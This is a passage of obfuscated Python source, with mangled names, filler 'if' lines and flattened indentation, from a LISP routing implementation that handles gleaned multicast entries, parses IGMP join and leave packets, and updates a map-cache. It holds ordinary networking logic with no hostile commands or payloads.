if 32 - 32: i1IIi % O0 / II111iiii - OoO0O00 + IiII * i11iIiiIii
if 55 - 55: II111iiii
if 93 - 93: i11iIiiIii / OoooooooOO % I1ii11iIi11i % I1ii11iIi11i
if 37 - 37: OoO0O00 . I11i / I1ii11iIi11i . OoO0O00 - I1Ii111 + Oo0Ooo
if 42 - 42: I1ii11iIi11i . I11i
if 95 - 95: I1IiiI - I11i * I1Ii111 - I11i
if ( iII == None ) :
iII = lisp_rloc ( )
I11 . rloc_set = [ iII ]
iII . priority = 253
iII . mpriority = 255
I11 . build_best_rloc_set ( )
if 92 - 92: oO0o % iIii1I11I1II1 * o0oOOo0O0Ooo * OoooooooOO - iIii1I11I1II1
if ( o0o0oooooo0O == None ) :
o0o0oooooo0O = lisp_rle ( geid . print_address ( ) )
iII . rle = o0o0oooooo0O
if 51 - 51: Ii1I - OoO0O00 + i1IIi
if ( IIIi11i1 == None ) :
IIIi11i1 = lisp_rle_node ( )
IIIi11i1 . rloc_name = OOoOOo0
o0o0oooooo0O . rle_nodes . append ( IIIi11i1 )
o0o0oooooo0O . build_forwarding_list ( )
lprint ( "Add RLE {} from {} for gleaned EID {}" . format ( I1I1iIiiiiII11 , I1iiIi111I , I1i ) )
elif ( rloc . is_exact_match ( IIIi11i1 . address ) == False or
port != IIIi11i1 . translated_port ) :
lprint ( "Changed RLE {} from {} for gleaned EID {}" . format ( I1I1iIiiiiII11 , I1iiIi111I , I1i ) )
if 11 - 11: II111iiii - iII111i + oO0o % Oo0Ooo
if 56 - 56: IiII
if 72 - 72: Oo0Ooo
if 37 - 37: i11iIiiIii * I1IiiI % ooOoO0o
if 23 - 23: OoO0O00 + o0oOOo0O0Ooo * I1IiiI
IIIi11i1 . store_translated_rloc ( rloc , port )
if 76 - 76: i1IIi . OOooOOo
if 78 - 78: OoooooooOO % OoOoOO00 * oO0o . I1ii11iIi11i
if 79 - 79: OoooooooOO
if 6 - 6: i11iIiiIii / II111iiii + II111iiii + I1ii11iIi11i % IiII - I1ii11iIi11i
if 92 - 92: IiII
if ( igmp ) :
iIiIII = seid . print_address ( )
if ( iIiIII not in lisp_gleaned_groups ) :
lisp_gleaned_groups [ iIiIII ] = { }
if 49 - 49: O0 . OoOoOO00
lisp_gleaned_groups [ iIiIII ] [ iiiii1I1III1 ] = lisp_get_timestamp ( )
if 7 - 7: i1IIi + II111iiii
if 96 - 96: I1Ii111 / OoO0O00
if 27 - 27: Ii1I
if 90 - 90: I1ii11iIi11i
if 43 - 43: OoO0O00 . I1IiiI . oO0o + Ii1I
if 7 - 7: iII111i / Oo0Ooo - OoO0O00 + I1Ii111 * II111iiii * ooOoO0o
if 80 - 80: oO0o - i1IIi / I11i . II111iiii % O0 % I11i
if 70 - 70: iIii1I11I1II1 * i1IIi * OOooOOo - Oo0Ooo % i1IIi
def lisp_remove_gleaned_multicast ( seid , geid ) :
if 60 - 60: o0oOOo0O0Ooo . OOooOOo % II111iiii - I1ii11iIi11i
if 4 - 4: OOooOOo % ooOoO0o
if 39 - 39: Ii1I
if 67 - 67: iIii1I11I1II1 - OOooOOo
I11 = lisp_map_cache_lookup ( seid , geid )
if ( I11 == None ) : return
if 47 - 47: OOooOOo - OOooOOo * I1Ii111
IIiiiI = I11 . rloc_set [ 0 ] . rle
if ( IIiiiI == None ) : return
if 24 - 24: I1ii11iIi11i
oOo = seid . print_address_no_iid ( )
iIi111Ii1 = False
for IIIi11i1 in IIiiiI . rle_nodes :
if ( IIIi11i1 . rloc_name == oOo ) :
iIi111Ii1 = True
break
if 37 - 37: II111iiii - iIii1I11I1II1 / o0oOOo0O0Ooo . O0 + II111iiii
if 9 - 9: o0oOOo0O0Ooo
if ( iIi111Ii1 == False ) : return
if 47 - 47: Ii1I * I1Ii111 / II111iiii
if 73 - 73: ooOoO0o
if 53 - 53: IiII . Oo0Ooo
if 54 - 54: i11iIiiIii % ooOoO0o % I1Ii111 + o0oOOo0O0Ooo
IIiiiI . rle_nodes . remove ( IIIi11i1 )
IIiiiI . build_forwarding_list ( )
if 2 - 2: IiII
iiiii1I1III1 = geid . print_address ( )
iIiIII = seid . print_address ( )
I1iiIi111I = green ( "{}" . format ( iIiIII ) , False )
I1i = green ( "(*, {})" . format ( iiiii1I1III1 ) , False )
lprint ( "Gleaned EID {} RLE removed for {}" . format ( I1i , I1iiIi111I ) )
if 25 - 25: OoOoOO00 . OoO0O00 * o0oOOo0O0Ooo . OoooooooOO - Oo0Ooo + I1IiiI
if 82 - 82: OoO0O00 - Ii1I * I11i * o0oOOo0O0Ooo
if 17 - 17: OoooooooOO + I1Ii111
if 91 - 91: iIii1I11I1II1 % i11iIiiIii - o0oOOo0O0Ooo
if ( iIiIII in lisp_gleaned_groups ) :
if ( iiiii1I1III1 in lisp_gleaned_groups [ iIiIII ] ) :
lisp_gleaned_groups [ iIiIII ] . pop ( iiiii1I1III1 )
if 98 - 98: o0oOOo0O0Ooo % II111iiii * IiII - i11iIiiIii * oO0o
if 15 - 15: O0 - II111iiii - Oo0Ooo . I1ii11iIi11i % OoO0O00
if 63 - 63: o0oOOo0O0Ooo / OoOoOO00 % I1ii11iIi11i % I11i
if 58 - 58: O0 + iII111i
if 66 - 66: i1IIi . O0 . i1IIi - iIii1I11I1II1 - ooOoO0o % I1ii11iIi11i
if 96 - 96: i1IIi + oO0o - OoOoOO00 - OoOoOO00
if ( IIiiiI . rle_nodes == [ ] ) :
I11 . delete_cache ( )
lprint ( "Gleaned EID {} remove, no more RLEs" . format ( I1i ) )
if 13 - 13: I11i
if 52 - 52: iII111i . OoOoOO00 * iIii1I11I1II1 . iII111i * IiII
if 52 - 52: iII111i + iII111i
if 35 - 35: I1Ii111 * oO0o + Ii1I / I1IiiI + O0 - I11i
if 42 - 42: o0oOOo0O0Ooo
if 89 - 89: o0oOOo0O0Ooo
if 99 - 99: I1ii11iIi11i + Oo0Ooo
if 20 - 20: OoO0O00 / iII111i
def lisp_change_gleaned_multicast ( seid , rloc , port ) :
iIiIII = seid . print_address ( )
if ( iIiIII not in lisp_gleaned_groups ) : return
if 62 - 62: i1IIi % iIii1I11I1II1 + OoOoOO00 - I1IiiI . I1ii11iIi11i
for o0o0o in lisp_gleaned_groups [ iIiIII ] :
lisp_geid . store_address ( o0o0o )
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , port , False )
if 92 - 92: i11iIiiIii * o0oOOo0O0Ooo . Oo0Ooo
if 15 - 15: o0oOOo0O0Ooo * IiII . iII111i % O0 . iIii1I11I1II1
if 34 - 34: OOooOOo / iII111i * iIii1I11I1II1 + i11iIiiIii
if 37 - 37: I11i + o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 8 - 8: Oo0Ooo * Ii1I % I11i - OoooooooOO
if 11 - 11: OoO0O00 - oO0o
if 50 - 50: II111iiii * IiII
if 26 - 26: OoO0O00 . II111iiii
if 19 - 19: iII111i / i11iIiiIii
if 31 - 31: I1Ii111 / I1Ii111 % IiII
if 68 - 68: O0 / OOooOOo % OoOoOO00
if 68 - 68: OoooooooOO - IiII + I1IiiI * IiII / I11i - OoO0O00
if 69 - 69: oO0o / II111iiii
if 56 - 56: i1IIi + II111iiii + Ii1I . OoooooooOO
if 26 - 26: OoooooooOO % Ii1I % I11i * oO0o - i1IIi - i1IIi
if 76 - 76: i11iIiiIii + OoO0O00 - iII111i . OoOoOO00 * Oo0Ooo
if 15 - 15: II111iiii + iIii1I11I1II1
if 100 - 100: OOooOOo
if 43 - 43: OoO0O00 + I1Ii111 + OoOoOO00
if 78 - 78: I11i
if 30 - 30: iIii1I11I1II1
if 74 - 74: I1IiiI - Oo0Ooo - i1IIi . iIii1I11I1II1 - I11i
if 57 - 57: I1IiiI - i11iIiiIii - I1ii11iIi11i
if 49 - 49: i1IIi . O0 % Ii1I * i1IIi
if 39 - 39: I1ii11iIi11i
if 74 - 74: II111iiii % oO0o * Oo0Ooo / iIii1I11I1II1
if 81 - 81: II111iiii + OoOoOO00 * O0
if 64 - 64: iIii1I11I1II1 * Ii1I
if 5 - 5: I11i . I11i / i1IIi - o0oOOo0O0Ooo % Oo0Ooo
if 85 - 85: OOooOOo
if 32 - 32: iII111i
if 27 - 27: iIii1I11I1II1 - iII111i
if 68 - 68: oO0o + OoooooooOO - i1IIi * OoOoOO00 % Oo0Ooo
if 19 - 19: IiII * Oo0Ooo + I1IiiI * I1Ii111 % iIii1I11I1II1
if 15 - 15: II111iiii % OoO0O00 % Oo0Ooo + I1Ii111
if 54 - 54: I1Ii111 + OOooOOo
if 6 - 6: Ii1I
if 8 - 8: OoO0O00
if 91 - 91: Ii1I
if 12 - 12: OoooooooOO + i11iIiiIii
if 63 - 63: OOooOOo . i11iIiiIii
if 50 - 50: IiII % i11iIiiIii - iII111i . OoOoOO00 / Oo0Ooo
if 30 - 30: Oo0Ooo . II111iiii + OoooooooOO % OoO0O00 * ooOoO0o * iIii1I11I1II1
if 91 - 91: OoooooooOO
if 86 - 86: iII111i / OoooooooOO - I1ii11iIi11i
if 63 - 63: ooOoO0o % Ii1I * I1IiiI
if 48 - 48: iII111i - iII111i - o0oOOo0O0Ooo + ooOoO0o - o0oOOo0O0Ooo / Ii1I
if 43 - 43: I1IiiI + Ii1I
if 37 - 37: OoOoOO00 - OoooooooOO . ooOoO0o - IiII % iIii1I11I1II1 . iIii1I11I1II1
if 64 - 64: OoOoOO00 + iII111i % I1Ii111 - OOooOOo + O0
if 83 - 83: I1Ii111 + I1Ii111
if 43 - 43: oO0o * i1IIi * Ii1I . iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: I1IiiI . i1IIi * OoOoOO00 / OOooOOo
if 50 - 50: II111iiii . OoO0O00
if 60 - 60: I11i . iIii1I11I1II1
if 41 - 41: II111iiii / I1IiiI
if 2 - 2: IiII / OoOoOO00 + I11i
if 3 - 3: OoooooooOO + Oo0Ooo + OOooOOo
if 20 - 20: Ii1I - oO0o - OoO0O00 + I1ii11iIi11i % OoO0O00 . i1IIi
if 2 - 2: ooOoO0o * IiII . Ii1I
if 69 - 69: IiII % i1IIi
if 17 - 17: o0oOOo0O0Ooo . OoO0O00 * ooOoO0o * II111iiii - OoooooooOO % iII111i
if 47 - 47: I1IiiI * iIii1I11I1II1 - I11i - o0oOOo0O0Ooo
if 47 - 47: IiII + OoO0O00 % ooOoO0o - iII111i - IiII - oO0o
if 63 - 63: OoooooooOO / I1Ii111
if 90 - 90: I1Ii111 . i11iIiiIii - iIii1I11I1II1 + I1Ii111
if 67 - 67: IiII - I1ii11iIi11i + ooOoO0o . iIii1I11I1II1 . IiII
if 13 - 13: I1IiiI / i11iIiiIii % iIii1I11I1II1 - Oo0Ooo . i11iIiiIii + I1IiiI
if 77 - 77: o0oOOo0O0Ooo / II111iiii + i11iIiiIii % Ii1I . iIii1I11I1II1
if 66 - 66: iII111i / oO0o - OoO0O00 . Oo0Ooo
if 31 - 31: IiII % O0
if 46 - 46: iIii1I11I1II1 - OoooooooOO . oO0o % iIii1I11I1II1 / i1IIi + Ii1I
if 5 - 5: I1ii11iIi11i % II111iiii
if 17 - 17: i11iIiiIii - II111iiii / O0 % OoO0O00 . Oo0Ooo + IiII
if 60 - 60: I11i % I1IiiI
if 99 - 99: oO0o . OOooOOo % iII111i * Ii1I
if 98 - 98: Oo0Ooo * O0 + i1IIi
if 41 - 41: i1IIi % OoO0O00 * iIii1I11I1II1
if 2 - 2: I1ii11iIi11i * iII111i . iIii1I11I1II1 * Oo0Ooo
if 34 - 34: i11iIiiIii % O0 . I1IiiI / ooOoO0o + OoO0O00
if 28 - 28: Ii1I / iIii1I11I1II1
if 41 - 41: iIii1I11I1II1
if 57 - 57: I1Ii111 * o0oOOo0O0Ooo - o0oOOo0O0Ooo * I11i
if 89 - 89: Ii1I % O0
if 81 - 81: OoooooooOO / II111iiii - ooOoO0o
if 14 - 14: O0
if 59 - 59: I11i % II111iiii . iIii1I11I1II1 * oO0o % Ii1I
if 79 - 79: OoooooooOO . II111iiii
if 55 - 55: II111iiii
if 2 - 2: I1ii11iIi11i * i1IIi + OOooOOo / OoO0O00 % OoOoOO00 / O0
if 47 - 47: OoooooooOO - i11iIiiIii - IiII * O0 * iII111i * Ii1I
if 36 - 36: I1Ii111
igmp_types = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 85 - 85: Oo0Ooo % OOooOOo
lisp_igmp_record_types = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 10 - 10: O0 + Oo0Ooo + Ii1I % IiII
def lisp_process_igmp_packet ( packet ) :
OO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
OO . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
OO = bold ( "from {}" . format ( OO . print_address_no_iid ( ) ) , False )
if 89 - 89: oO0o / iII111i + OOooOOo
I1I1iIiiiiII11 = bold ( "Receive" , False )
lprint ( "{} {}-byte {}, IGMP packet: {}" . format ( I1I1iIiiiiII11 , len ( packet ) , OO ,
lisp_format_packet ( packet ) ) )
if 27 - 27: Ii1I / o0oOOo0O0Ooo % I11i
if 96 - 96: i11iIiiIii % O0
if 11 - 11: II111iiii . i11iIiiIii % ooOoO0o * Ii1I * OoOoOO00 * OoooooooOO
if 80 - 80: OoO0O00
OooOOoO0Oo = ( struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ] & 0x0f ) * 4
if 55 - 55: IiII - O0 % II111iiii * OOooOOo / IiII * OOooOOo
if 37 - 37: II111iiii
if 12 - 12: II111iiii - iII111i . I1Ii111 % Ii1I + I1Ii111
if 32 - 32: I1ii11iIi11i % i11iIiiIii
O0oo = packet [ OooOOoO0Oo : : ]
Oo0o0ooo0oo0 = struct . unpack ( "B" , O0oo [ 0 : 1 ] ) [ 0 ]
if 44 - 44: I1ii11iIi11i + IiII + IiII * I1ii11iIi11i - OoooooooOO / I1Ii111
if 3 - 3: I1ii11iIi11i + o0oOOo0O0Ooo * I11i / Oo0Ooo
if 31 - 31: i11iIiiIii % OoO0O00 - oO0o / o0oOOo0O0Ooo % O0
if 53 - 53: iIii1I11I1II1 * I1ii11iIi11i
if 46 - 46: OOooOOo % OoOoOO00 * iII111i
o0o0o = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
o0o0o . address = socket . ntohl ( struct . unpack ( "II" , O0oo [ : 8 ] ) [ 1 ] )
iiiii1I1III1 = o0o0o . print_address_no_iid ( )
if 55 - 55: I1IiiI * iIii1I11I1II1 . OoOoOO00
if ( Oo0o0ooo0oo0 == 17 ) :
lprint ( "IGMP Query for group {}" . format ( iiiii1I1III1 ) )
return ( True )
if 82 - 82: iIii1I11I1II1 - iII111i % I1IiiI + I1IiiI * i1IIi % O0
if 63 - 63: I1IiiI + OoOoOO00
o0O0O000 = ( Oo0o0ooo0oo0 in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( o0O0O000 == False ) :
oOOoO0 = "{} ({})" . format ( Oo0o0ooo0oo0 , igmp_types [ Oo0o0ooo0oo0 ] ) if ( Oo0o0ooo0oo0 in igmp_types ) else Oo0o0ooo0oo0
if 8 - 8: OoOoOO00 . Ii1I . I11i . II111iiii
lprint ( "IGMP type {} not supported" . format ( oOOoO0 ) )
return ( [ ] )
if 34 - 34: O0 * OoooooooOO + I1Ii111
if 94 - 94: I1ii11iIi11i * O0 - ooOoO0o % OoooooooOO + IiII - OoOoOO00
if ( len ( O0oo ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 88 - 88: iIii1I11I1II1 . I1Ii111
if 88 - 88: OOooOOo % OoOoOO00 . I1IiiI . Ii1I
if 76 - 76: I11i
if 42 - 42: I1ii11iIi11i . iIii1I11I1II1 % I11i
if 54 - 54: OoOoOO00 / Ii1I
if ( Oo0o0ooo0oo0 == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( iiiii1I1III1 , False ) ) )
return ( [ [ None , iiiii1I1III1 , False ] ] )
if 84 - 84: Oo0Ooo / OoO0O00 . o0oOOo0O0Ooo - iII111i . iII111i - II111iiii
if ( Oo0o0ooo0oo0 in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( Oo0o0ooo0oo0 == 0x12 ) else 2 , bold ( iiiii1I1III1 , False ) ) )
if 99 - 99: I1Ii111 % Oo0Ooo
if 61 - 61: OoooooooOO % i11iIiiIii + OOooOOo
if 53 - 53: iII111i . iIii1I11I1II1
if 59 - 59: II111iiii . II111iiii - iII111i
if 46 - 46: oO0o / iIii1I11I1II1 + OoO0O00
if ( iiiii1I1III1 . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , iiiii1I1III1 , True ] ] )
if 33 - 33: Ii1I . iIii1I11I1II1 . O0 * I1ii11iIi11i . OoOoOO00 / i11iIiiIii
if 85 - 85: iII111i
if 23 - 23: O0
if 83 - 83: i11iIiiIii % OoooooooOO
if 45 - 45: OoO0O00 + Ii1I
return ( [ ] )
if 90 - 90: O0 * i1IIi . i1IIi * I1ii11iIi11i + I1ii11iIi11i / i1IIi
if 52 - 52: O0 / iIii1I11I1II1 * IiII
if 50 - 50: oO0o . Ii1I . OoooooooOO * o0oOOo0O0Ooo
if 25 - 25: o0oOOo0O0Ooo % ooOoO0o
if 91 - 91: I1Ii111 * i11iIiiIii / o0oOOo0O0Ooo * oO0o - o0oOOo0O0Ooo * OOooOOo
oo0OOo00OOoO = o0o0o . address
O0oo = O0oo [ 8 : : ]
if 2 - 2: i1IIi - OoOoOO00 / iII111i
o0Ooo = "BBHI"
ii11iiI = struct . calcsize ( o0Ooo )
i1IOooOOOOoo = "I"
OoOOOo = struct . calcsize ( i1IOooOOOOoo )
OO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 21 - 21: ooOoO0o * OoO0O00 % Oo0Ooo
if 81 - 81: OoO0O00 + I1Ii111 . OoOoOO00 * I11i * O0
if 9 - 9: Ii1I . i1IIi % iIii1I11I1II1
if 72 - 72: i11iIiiIii + OOooOOo . I1Ii111 + Ii1I + OOooOOo
OoO000O0ooOO = [ ]
for OoOOoO0oOo in range ( oo0OOo00OOoO ) :
if ( len ( O0oo ) < ii11iiI ) : return
O0OO000OO0o , ooooO00o0 , iI1IIii1IiiII , Ii1IiIIIi = struct . unpack ( o0Ooo ,
O0oo [ : ii11iiI ] )
if 29 - 29: I11i % OoooooooOO . o0oOOo0O0Ooo % i1IIi
O0oo = O0oo [ ii11iiI : : ]
if 29 - 29: OOooOOo . OoooooooOO . iII111i % i1IIi + i11iIiiIii
if ( O0OO000OO0o not in lisp_igmp_record_types ) :
lprint ( "Invalid record type {}" . format ( O0OO000OO0o ) )
continue
if 9 - 9: IiII
if 29 - 29: I11i * II111iiii / I1ii11iIi11i
IiI1i1 = lisp_igmp_record_types [ O0OO000OO0o ]
iI1IIii1IiiII = socket . ntohs ( iI1IIii1IiiII )
o0o0o . address = socket . ntohl ( Ii1IiIIIi )
iiiii1I1III1 = o0o0o . print_address_no_iid ( )
if 35 - 35: I1ii11iIi11i + I1Ii111
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( IiI1i1 , iiiii1I1III1 , iI1IIii1IiiII ) )
if 25 - 25: iIii1I11I1II1 / I11i % OoooooooOO / Oo0Ooo
if 4 - 4: i1IIi % i1IIi % oO0o
if 51 - 51: o0oOOo0O0Ooo * i11iIiiIii
if 44 - 44: II111iiii - o0oOOo0O0Ooo + i1IIi / I1Ii111 . I11i
if 17 - 17: OOooOOo - O0 . II111iiii - OoooooooOO + I1ii11iIi11i
if 100 - 100: OoOoOO00 * OOooOOo % i11iIiiIii / OoOoOO00
if 72 - 72: I1IiiI . oO0o
o00Oooo00 = False
if ( O0OO000OO0o in ( 1 , 5 ) ) : o00Oooo00 = True
if ( O0OO000OO0o in ( 2 , 4 ) and iI1IIii1IiiII == 0 ) : o00Oooo00 = True
iiiiI1 = "join" if ( o00Oooo00 ) else "leave"
if 26 - 26: I1ii11iIi11i . Ii1I - iIii1I11I1II1 . Ii1I / Ii1I % I11i
if 56 - 56: OOooOOo . I11i + O0 * oO0o - i11iIiiIii / i11iIiiIii
if 73 - 73: I1ii11iIi11i
if 59 - 59: iII111i % iIii1I11I1II1 * OoOoOO00
if ( iiiii1I1III1 . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 41 - 41: i1IIi * IiII - i11iIiiIii / O0 + Oo0Ooo + ooOoO0o
if 94 - 94: OoO0O00 . O0 + iIii1I11I1II1 . oO0o % oO0o
if 7 - 7: I1ii11iIi11i * oO0o / OoOoOO00
if 89 - 89: OoO0O00 / oO0o % I11i - I1ii11iIi11i . o0oOOo0O0Ooo
if 46 - 46: i11iIiiIii
if 99 - 99: i11iIiiIii / oO0o / OoOoOO00 / O0 * I1ii11iIi11i
if 72 - 72: ooOoO0o - I1Ii111 - iIii1I11I1II1 . I1IiiI
if 77 - 77: Oo0Ooo * OoO0O00
if ( iI1IIii1IiiII == 0 ) :
OoO000O0ooOO . append ( [ None , iiiii1I1III1 , o00Oooo00 ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( iiiiI1 , False ) ,
bold ( iiiii1I1III1 , False ) ) )
if 67 - 67: OoOoOO00 . I1Ii111 / I1IiiI * II111iiii
if 45 - 45: I1ii11iIi11i * o0oOOo0O0Ooo . iIii1I11I1II1 * Oo0Ooo
if 58 - 58: OOooOOo + O0
if 19 - 19: o0oOOo0O0Ooo
if 8 - 8: OOooOOo * OOooOOo - Ii1I * OoOoOO00 % OoO0O00 * O0
for I1I1II1iI in range ( iI1IIii1IiiII ) :
if ( len ( O0oo ) < OoOOOo ) : return
Ii1IiIIIi = struct . unpack ( i1IOooOOOOoo , O0oo [ : OoOOOo ] ) [ 0 ]
OO . address = socket . ntohl ( Ii1IiIIIi )
oo000Oo0 = OO . print_address_no_iid ( )
OoO000O0ooOO . append ( [ oo000Oo0 , iiiii1I1III1 , o00Oooo00 ] )
lprint ( "{} ({}, {})" . format ( iiiiI1 ,
green ( oo000Oo0 , False ) , bold ( iiiii1I1III1 , False ) ) )
O0oo = O0oo [ OoOOOo : : ]
if 17 - 17: OoO0O00 + I1Ii111 / iIii1I11I1II1
if 77 - 77: OOooOOo
if 26 - 26: Oo0Ooo . Oo0Ooo . oO0o / O0 / I11i * Oo0Ooo
if 75 - 75: I11i / o0oOOo0O0Ooo - II111iiii / I1IiiI . I1Ii111
if 28 - 28: oO0o * II111iiii + Oo0Ooo
if 11 - 11: O0
if 9 - 9: II111iiii
if 52 - 52: I1Ii111 % I1IiiI - Oo0Ooo . i1IIi
return ( OoO000O0ooOO )
if 2 - 2: iII111i % OoOoOO00 * iIii1I11I1II1 * ooOoO0o - OoooooooOO - IiII
if 40 - 40: OoO0O00 . i11iIiiIii + ooOoO0o
if 30 - 30: OOooOOo . OoO0O00 % iII111i - OoO0O00 % i11iIiiIii
if 28 - 28: Ii1I + Oo0Ooo / iIii1I11I1II1
if 57 - 57: o0oOOo0O0Ooo
if 23 - 23: II111iiii
if 88 - 88: I1IiiI / II111iiii * i11iIiiIii - oO0o - OOooOOo
if 41 - 41: iIii1I11I1II1
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 7 - 7: Oo0Ooo + iII111i . ooOoO0o
def lisp_glean_map_cache ( seid , rloc , encap_port , igmp ) :
if 31 - 31: iIii1I11I1II1 - OoOoOO00 - II111iiii / I1ii11iIi11i
if 70 - 70: iIii1I11I1II1 / I1ii11iIi11i . I1Ii111 % I1ii11iIi11i
if 40 - 40: I1Ii111 + o0oOOo0O0Ooo - I11i + OoO0O00
if 49 - 49: i11iIiiIii % OoO0O00 - Ii1I + I1Ii111
if 7 - 7: ooOoO0o * I1ii11iIi11i - Ii1I % i1IIi + I11i
if 22 - 22: I1IiiI - OOooOOo - II111iiii * I1IiiI
o000Ooo = True
I11 = lisp_map_cache . lookup_cache ( seid , True )
if ( I11 and len ( I11 . rloc_set ) != 0 ) :
I11 . last_refresh_time = lisp_get_timestamp ( )
if 85 - 85: i1IIi % Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
I1III1II1iII = I11 . rloc_set [ 0 ]
OOO0Ooo0 = I1III1II1iII . rloc
oO0OooO0 = I1III1II1iII . translated_port
o000Ooo = ( OOO0Ooo0 . is_exact_match ( rloc ) == False or
oO0OooO0 != encap_port )
if 72 - 72: II111iiii % ooOoO0o - ooOoO0o - OoOoOO00
if ( o000Ooo ) :
I1i = green ( seid . print_address ( ) , False )
I1I1iIiiiiII11 = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Change gleaned EID {} to RLOC {}" . format ( I1i , I1I1iIiiiiII11 ) )
I1III1II1iII . delete_from_rloc_probe_list ( I11 . eid , I11 . group )
lisp_change_gleaned_multicast ( seid , rloc , encap_port )
if 20 - 20: Ii1I
else :
I11 = lisp_mapping ( "" , "" , [ ] )
I11 . eid . copy_address ( seid )
I11 . mapping_source . copy_address ( rloc )
I11 . map_cache_ttl = LISP_GLEAN_TTL
I11 . gleaned = True
I1i = green ( seid . print_address ( ) , False )
I1I1iIiiiiII11 = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Add gleaned EID {} to map-cache with RLOC {}" . format ( I1i , I1I1iIiiiiII11 ) )
I11 . add_cache ( )
if 75 - 75: o0oOOo0O0Ooo / I1IiiI
if 91 - 91: OoooooooOO
if 57 - 57: oO0o * I1IiiI / OoooooooOO . O0
if 39 - 39: IiII / I1IiiI + i11iIiiIii + IiII - IiII . o0oOOo0O0Ooo
if 41 - 41: Oo0Ooo + IiII % o0oOOo0O0Ooo
if ( o000Ooo ) :
iII = lisp_rloc ( )
iII . store_translated_rloc ( rloc , encap_port )
iII . add_to_rloc_probe_list ( I11 . eid , I11 . group )
iII . priority = 253
iII . mpriority = 255
IiIiIiiII1I = [ iII ]
I11 . rloc_set = IiIiIiiII1I
I11 . build_best_rloc_set ( )
if 73 - 73: O0
if 92 - 92: I1ii11iIi11i * o0oOOo0O0Ooo - OoooooooOO * OOooOOo . IiII - o0oOOo0O0Ooo
if 7 - 7: i1IIi . i11iIiiIii . i1IIi % IiII * iII111i * OoooooooOO
if 48 - 48: i1IIi . IiII / i1IIi / iII111i
if 13 - 13: ooOoO0o - OoOoOO00 + I1ii11iIi11i % ooOoO0o % iIii1I11I1II1
if ( igmp == None ) : return
if 94 - 94: OOooOOo / OoO0O00 / OoO0O00 / Ii1I . IiII
if 35 - 35: i1IIi
if 58 - 58: Ii1I - IiII / ooOoO0o % o0oOOo0O0Ooo + I1ii11iIi11i
if 89 - 89: IiII / OoooooooOO
if 13 - 13: II111iiii . OOooOOo - O0 * oO0o
lisp_geid . instance_id = seid . instance_id
if 71 - 71: ooOoO0o % ooOoO0o + o0oOOo0O0Ooo + iII111i / OoOoOO00
if 27 - 27: I1ii11iIi11i * OoO0O00 - OoO0O00
if 87 - 87: I1IiiI * I11i + iIii1I11I1II1 % i1IIi
if 6 - 6: o0oOOo0O0Ooo
if 94 - 94: I1ii11iIi11i * i11iIiiIii
O0O000o00oo = lisp_process_igmp_packet ( igmp )
if ( type ( O0O000o00oo ) == bool ) : return
if 95 - 95: OoooooooOO - II111iiii . I1Ii111
for OO , o0o0o , o00Oooo00 in O0O000o00oo :
if ( OO != None ) : continue
if 97 - 97: i1IIi * iIii1I11I1II1
if 44 - 44: O0 - o0oOOo0O0Ooo - I1Ii111 % O0
if 31 - 31: i11iIiiIii - I11i
if 91 - 91: I11i - iII111i
lisp_geid . store_address ( o0o0o )
oOOOo , ooooO00o0 , o00oOo0O0OO = lisp_allow_gleaning ( seid , lisp_geid , rloc )
if ( oOOOo == False ) : continue
if 35 - 35: I1IiiI * I11i + I11i
if ( o00Oooo00 ) :
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , encap_port ,
True )
else :
lisp_remove_gleaned_multicast ( seid , lisp_geid )
if 67 - 67: I1ii11iIi11i - I1IiiI + Ii1I * Ii1I + Oo0Ooo
if 41 - 41: i11iIiiIii
if 97 - 97: i1IIi / Ii1I / ooOoO0o . Ii1I - ooOoO0o + oO0o
if 27 - 27: OOooOOo % O0
if 96 - 96: OoooooooOO / OOooOOo
if 87 - 87: IiII - OoooooooOO
if 53 - 53: OoOoOO00 + Oo0Ooo
if 33 - 33: I11i - OOooOOo + Oo0Ooo - iII111i * iII111i
if 44 - 44: Oo0Ooo % OoOoOO00 / oO0o
if 34 - 34: II111iiii + Ii1I + OoOoOO00
if 9 - 9: I11i / oO0o * OoO0O00
if 26 - 26: I1IiiI % OOooOOo * OoOoOO00
def lisp_is_json_telemetry ( json_string ) :
try :
o0o0OO = json . loads ( json_string )
if ( type ( o0o0OO ) != dict ) : return ( None )
except :
lprint ( "Could not decode telemetry json: {}" . format ( json_string ) )
return ( None )
if 14 - 14: I11i * Oo0Ooo . I1Ii111 * Ii1I . i11iIiiIii * I1ii11iIi11i
if 11 - 11: oO0o + oO0o + o0oOOo0O0Ooo / iIii1I11I1II1 / I11i
if ( "type" not in o0o0OO ) : return ( None )
if ( "sub-type" not in o0o0OO ) : return ( None )
if ( o0o0OO [ "type" ] != "telemetry" ) : return ( None )
if ( o0o0OO [ "sub-type" ] != "timestamps" ) : return ( None )
return ( o0o0OO )
